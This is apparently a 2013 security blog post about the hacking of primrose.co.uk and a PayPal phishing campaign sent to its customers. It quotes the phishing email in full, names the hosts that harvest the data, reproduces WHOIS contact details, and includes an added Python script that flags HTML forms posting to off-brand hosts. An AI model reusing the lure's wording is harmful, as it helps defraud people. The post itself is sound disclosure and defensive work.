
Thursday 18 July 2013

primrose.co.uk hacked, email addresses compromised

Garden accessory site primrose.co.uk has been hacked, and email addresses stored in their system are being abused for phishing purposes:

From:     paypal.co.uk [service@paypal.co.uk]
Date:     18 July 2013 11:01
Subject:     We cannot process your payment at this time.

   
Dear,

We need your help resolving an issue with your account.To give us time to work together on this, we've temporarily limited what you can do with your account until the issue is resolved.
we understand it may be frustrating not to have full access to your PayPal account.We want to work with you to get your account back to normal as quickly as possible.
What's the problem ?

It's been a little while since you used your account.For reasons relating to the safe use of the PayPal service we need some more information about your account.

Reference Number: PP-001-278-254-803

It's usually quite straight forward to take care of these things.Most of the time, we just need some more information about your account or latest transactions.

1.
    Download the attached document and open it in a browser window secure.
2.
    Confirm that you are the account holder and follow the instructions.

Yours sincerely,
PayPal
   

Copyright 2013 PayPal. All rights reserved PayPal Email ID PP1589

The attached form Account Information-Paypal.html is basically a phishing page, pulling content from www.thesenddirect.com (62.149.142.113 - Aruba, Italy) and submitting the data to www.paypserv.com (62.149.142.152 - also Aruba). The WHOIS details are no doubt fake and are respectively:

Saunders, John Alan  mahibarayanlol@gmail.com
4 The Laurels off Oatland Close Botley, 4
Southampton, GB SO322EN
IT
+39.447885623455

----------

Clarke, Victoria  johanjo1010@gmail.com
Innex Cottage Ropers Lane, 754
Wrington, GB BS405NH
IT
+39.441934862064
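
The attachment's behaviour described above (a local HTML file that loads content from one host and submits the form to another) is easy to check for when triaging a suspicious attachment. The following is an added example, not code from the original post: the sample HTML is constructed, only the two hostnames come from the post, and the `brand_domains` default is an assumption.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for an HTML attachment of the kind described above.
# Only the two hostnames come from the post; paths and field names are made up.
SAMPLE_ATTACHMENT = """
<html><head>
<link rel="stylesheet" href="http://www.thesenddirect.com/css/style.css">
</head><body>
<img src="http://www.thesenddirect.com/img/logo.png">
<form method="post" action="http://www.paypserv.com/submit.php">
<input type="text" name="email"><input type="password" name="pass">
</form></body></html>
"""

# Attribute that makes the browser fetch remote content, per tag.
FETCH_ATTRS = {"img": "src", "script": "src", "link": "href", "iframe": "src"}


class AttachmentAudit(HTMLParser):
    """Collect the hosts an HTML attachment loads from and submits to."""
    def __init__(self):
        super().__init__()
        self.fetch_hosts, self.post_hosts = set(), set()

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._add(self.post_hosts, attrs.get("action"))
        elif tag in FETCH_ATTRS:
            self._add(self.fetch_hosts, attrs.get(FETCH_ATTRS[tag]))

    @staticmethod
    def _add(bucket, url):
        host = urlparse(url or "").hostname  # None for relative or empty URLs
        if host:
            bucket.add(host.lower())


def audit(html, brand_domains=("paypal.com", "paypal.co.uk")):
    """Return remote hosts used by the attachment and those outside the brand."""
    parser = AttachmentAudit()
    parser.feed(html)
    parser.close()
    def off_brand(host):
        return not any(host == d or host.endswith("." + d) for d in brand_domains)
    return {"fetch_hosts": sorted(parser.fetch_hosts),
            "post_hosts": sorted(parser.post_hosts),
            "off_brand_post_hosts": sorted(filter(off_brand, parser.post_hosts))}
```

A form in a mail attachment that posts to any host outside the claimed brand's domains is a strong signal on its own, whatever the page looks like.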


Primrose.co.uk were informed of the breach on 4th July and told me that IT were investigating, but as I haven't heard anything back and customers haven't been notified then I will assume they did not find anything.

Of note is that the spam email does not address customers by name, so it is possibly only email addresses that have been leaked. Also, passwords do not appear to be kept in plaintext which is good. Without further information from primrose.co.uk it is impossible to say if any financial data has been compromised.
